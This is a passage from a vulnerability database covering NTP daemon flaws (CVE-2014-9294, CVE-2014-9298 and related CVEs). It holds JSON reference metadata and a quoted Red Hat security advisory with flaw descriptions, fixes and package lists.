utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n", "sources": [ { "db": "NVD", "id": "CVE-2014-9294" }, { "db": "CERT/CC", "id": "VU#852879" }, { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "BID", "id": "71762" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "129686" }, { "db": "PACKETSTORM", "id": "129711" }, { "db": "PACKETSTORM", "id": "129680" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130475" }, { "db": "PACKETSTORM", "id": "129723" } ], "trust": 3.42 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#852879", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2014-9294", "trust": 3.6 }, { "db": "BID", "id": "71762", "trust": 1.9 }, { "db": "MCAFEE", "id": "SB10103", "trust": 1.6 }, { "db": "SECUNIA", "id": "62209", "trust": 1.6 }, { "db": "ICS CERT", "id": "ICSA-14-353-01", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-14-353-01C", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96605606", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007351", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201412-455", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-14-353-01A", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10663", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "129716", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129793", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130140", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129686", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129711", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129680", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129684", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130475", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129723", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "129686" }, { "db": "PACKETSTORM", "id": "129711" }, { "db": "PACKETSTORM", "id": "129680" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130475" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "CNNVD", "id": "CNNVD-201412-455" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "id": "VAR-201412-0614", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.37128115000000006 }, "last_update_date": "2024-07-22T22:55:20.564000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ntp-4.2.2p1-18.0.1.AXS3", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4191\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "ntp-4.2.6p5-2.0.2.AXS4", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4190\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "title": "HPSBPV03266 SSRT101878", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04574882" }, { "title": "HPSBGN03277 SSRT101957", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04582466" }, { "title": "NV15-009", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html" }, { "title": "Bug 2666", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2666" }, { "title": "Changes for util/ntp-keygen.c", "trust": 0.8, "url": "http://bk1.ntp.org/ntp-dev/util/ntp-keygen.c?page=diffs\u0026rev=4eae1b72298krobqmx-y8urcirph5g" }, { "title": "Security Notice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "title": "Bug 1176035", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176035" }, { "title": "RHSA-2014:2025", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "title": "RHSA-2015:0104", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1 Network Time Protocol daemon (ntpd)\u306e\u8106\u5f31\u6027(CVE-2014-9293\u301c9296)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/ntpd_cve-2014-9293.html" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1127/1127934_cisco-sa-20141222-ntpd-j.html" }, { "title": "ntp-dev-4.2.7p230", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52922" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "CNNVD", "id": "CNNVD-201412-455" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "trust": 2.7, "url": "http://www.kb.cert.org/vuls/id/852879" }, { "trust": 2.5, "url": "http://advisories.mageia.org/mgasa-2014-0541.html" }, { "trust": 2.4, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "trust": 1.6, "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/71762" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "trust": 1.6, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10103" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142590659431171\u0026w=2" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:003" }, { "trust": 1.6, "url": "http://bk1.ntp.org/ntp-dev/util/ntp-keygen.c?page=diffs\u0026rev=4eae1b72298krobqmx-y8urcirph5g" }, { "trust": 1.6, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04916783" }, { "trust": 1.6, "url": "http://bugs.ntp.org/show_bug.cgi?id=2666" }, { "trust": 1.6, "url": "http://secunia.com/advisories/62209" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142469153211996\u0026w=2" }, { "trust": 1.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176035" }, { "trust": 1.6, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1047-security-advisory-8" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=144182594518755\u0026w=2" }, { "trust": 1.6, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04790232" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=142853370924302\u0026w=2" }, { "trust": 1.1, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.9, "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9294" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9295" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9293" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2" }, { "trust": 0.8, "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm" }, { "trust": 0.8, "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01" }, { "trust": 0.8, "url": "https://support.apple.com/en-us/ht6601" }, { "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01c" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96605606/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9294" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9296" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-408044.htm" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574882" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101006439" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176032" }, { "trust": 0.3, "url": "http://support.citrix.com/article/ctx200355" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jan/att-97/esa-2015-004.txt" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:31.ntp.asc" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04582466" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04916783" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/sep/41" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699578" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696755" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01a" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory2.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022036" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1ssrvpoaix71security150210-1549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696812" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020645" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097484" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097490" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/ntpd_cve-2014-9293.html" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9295" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9294" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9293" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9296" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-14:31.ntp.asc\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296\u003e" }, { "trust": 0.1, "url": "https://www.kb.cert.org/vuls/id/852879\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.1" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2449-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.4p8+dfsg-1ubuntu2.2" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9294" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9296" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9295" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201412-34.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9293" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "129686" }, { "db": "PACKETSTORM", "id": "129711" }, { "db": "PACKETSTORM", "id": "129680" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130475" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "CNNVD", "id": "CNNVD-201412-455" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "129686" }, { "db": "PACKETSTORM", "id": "129711" }, { "db": "PACKETSTORM", "id": "129680" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130475" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "CNNVD", "id": "CNNVD-201412-455" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-19T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2014-12-19T00:00:00", "db": "BID", "id": "71762" }, { "date": "2014-12-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "date": "2014-12-24T16:34:30", "db": "PACKETSTORM", "id": "129716" }, { "date": "2015-01-05T16:17:48", "db": "PACKETSTORM", "id": "129793" }, { "date": "2015-01-29T06:07:22", "db": "PACKETSTORM", "id": "130140" }, { "date": "2014-12-22T17:16:27", "db": "PACKETSTORM", "id": "129686" }, { "date": "2014-12-24T16:25:31", "db": "PACKETSTORM", "id": "129711" }, { "date": "2014-12-22T17:15:01", "db": "PACKETSTORM", "id": "129680" }, { "date": "2014-12-22T17:16:05", "db": "PACKETSTORM", "id": "129684" }, { "date": "2015-02-20T20:22:00", "db": "PACKETSTORM", "id": "130475" }, { "date": "2014-12-26T15:46:55", "db": "PACKETSTORM", "id": "129723" }, { "date": "2014-12-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201412-455" }, { "date": "2014-12-20T02:59:01.587000", "db": "NVD", "id": "CVE-2014-9294" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2016-10-26T09:11:00", "db": "BID", "id": "71762" }, { "date": "2016-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "date": "2021-11-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201412-455" }, { "date": "2021-11-17T22:15:38.177000", "db": "NVD", "id": "CVE-2014-9294" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "129711" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "CNNVD", "id": "CNNVD-201412-455" } ], "trust": 1.1 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)", "sources": [ { "db": "CERT/CC", "id": "VU#852879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201412-455" } ], "trust": 0.6 } }
var-201510-0706
Vulnerability from variot
The read_network_packet function in ntp_io.c in ntpd in NTP 4.x before 4.2.8p1 on Linux and OS X does not properly determine whether a source IP address is an IPv6 loopback address, which makes it easier for remote attackers to spoof restricted packets, and read or write to the runtime state, by leveraging the ability to reach the ntpd machine's network interface with a packet from the ::1 address. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. NTP is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 =====================================================================
- Summary:
Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat.
Bug fixes:
-
The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111)
-
The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014)
-
Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116)
-
The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640)
Enhancements:
-
This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828)
-
This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154)
-
Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. slew [PATCH] 1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto 1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks 1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
